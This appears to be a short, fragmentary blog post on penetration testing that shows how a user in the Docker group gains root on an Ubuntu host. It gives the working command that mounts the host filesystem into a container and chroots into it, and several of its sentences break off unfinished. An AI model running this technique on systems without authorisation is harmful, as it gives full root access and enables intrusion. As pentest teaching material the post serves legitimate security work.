hosting image

Pentest Docker Engine priv escalation


  • ssh user with docker priv.
  • docker installed.
  • ubuntu server


usually normal docker usage is :

docker run hello-world
This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.

we got the priv

 to execute it …

Next :
  • docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash


  • Explanation :
    Parameter -v will create volume in docker instance , Parameter -it  makes docker in shell mode instead of daemon process.

and result is  .


infected version

more info about the bug



Leave a Reply

Your email address will not be published. Required fields are marked *